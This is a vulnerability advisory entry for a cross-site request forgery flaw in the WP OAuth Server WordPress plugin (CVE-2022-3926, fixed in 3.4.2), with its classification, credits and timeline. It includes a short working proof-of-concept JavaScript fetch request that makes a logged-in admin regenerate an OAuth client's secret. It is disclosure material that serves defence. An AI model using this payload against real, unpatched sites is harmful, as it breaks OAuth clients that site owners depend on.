WordPress Plugin Vulnerabilities

WP OAuth Server < 3.4.2 - Client Secret Regeneration via CSRF

Description

The plugin does not have CSRF check when regenerating secrets, which could allow attackers to make logged in admins regenerate the secret of an arbitrary client given they know the client ID

Proof of Concept

Make a logged in admin open a page containing the HTML code below. This will regenerate the secret for the client with ID KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7

fetch('https://example.com/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=wo_regenerate_secret&data=KCzvPgkQndGfbFy34jfwoxKVCp1VzFhgSZ3PywN7',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Plugin icon
oauth2-provider
Fixed in 3.4.2

References

CVE
CVE-2022-3926

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
4.3 (medium)

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified
Yes
WPVDB ID
e1fcde2a-91a5-40cb-876b-884f01c80336

Timeline

Publicly Published
2022-11-10 (about 1 years ago)
Added
2022-11-10 (about 1 years ago)
Last Updated
2023-03-27 (about 1 years ago)

Other

Published
Title
Published
2023-10-18
Title
Appointment Calendar <= 2.9.6 - CSRF
Published
2024-04-15
Title
BMI Adult & Kid Calculator < 1.2.2 - Cross-Site Request Forgery to Cross-Site Scripting
Published
2022-09-11
Title
RD Station < 5.2.1 - Multiple CSRF
Published
2024-05-09
Title
Social Sharing Plugin – Social Warfare < 4.4.6 - Cross-Site Request Forgery
Published
2020-03-09
Title
WPML < 4.3.7 - Authenticated Cross Site Request Forgery leading to Remote Code Execution